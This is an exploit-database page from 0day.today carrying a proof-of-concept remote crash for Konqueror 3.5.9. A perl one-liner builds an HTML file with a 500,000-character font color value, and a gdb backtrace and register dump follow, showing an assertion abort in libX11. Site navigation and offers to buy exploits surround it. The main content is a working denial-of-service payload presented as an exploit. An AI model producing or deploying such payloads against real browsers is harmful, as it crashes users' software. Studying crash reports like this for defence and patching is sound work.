0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Konqueror 3.5.9 (font color) Remote Crash Vulnerability
[======================================================= Konqueror 3.5.9 (font color) Remote Crash Vulnerability ======================================================= Konqueror isn't immune from fuzzing either Konqueror, KDE's mighty mascot browser.. fuzzed. perl -e 'print "<html>\n" . "<font color=" . "A" x 500000 . "\n</html>"' > kdie.html #6 0xb7f8d410 in __kernel_vsyscall () #7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6 #8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6 #9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6 #10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6 #11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6 #12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6 #13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6 #14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3 #15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3 #16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4 #17 0xb60d143b in DOM::CSSParser::parseColorFromValue () from /usr/lib/libkhtml.so.4 #18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4 #19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 #20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4 #21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4 #22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 #23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4 #24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4 #25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4 #26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4 #27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4 #28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4 #29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4 #30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4 #31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4 #32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4 #33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4 #34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 #35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4 #36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4 #37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4 #38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 #39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4 #40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 #41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 #42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4 #43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4 #44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 #45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 #46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3 #47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3 #48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3 #49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3 #50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4 #51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3 #52 0xb71fdb4a in QEventLoop::activateSocketNotifiers () from /usr/lib/libqt-mt.so.3 #53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3 #54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3 #55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3 #56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3 #57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so #58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so #59 0x0804ee20 in ?? () #60 0x0804f541 in ?? () #61 0x0804fa7b in ?? () #62 0x0805057d in ?? () #63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6 #64 0x0804bb91 in ?? () Looks like it might have something to do with libx11... konqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed. Program received signal SIGABRT, Aborted. [Switching to Thread 0xb660f6c0 (LWP 10553)] 0xb7eef410 in __kernel_vsyscall () (gdb) i r eax 0x0 0 ecx 0x2939 10553 edx 0x6 6 ebx 0x2939 10553 esp 0xbf855efc 0xbf855efc ebp 0xbf855f18 0xbf855f18 esi 0x2939 10553 edi 0xb7cd8ff4 -1211265036 eip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16> eflags 0x206 [ PF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) Tested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. # 0day.today [2024-11-16] #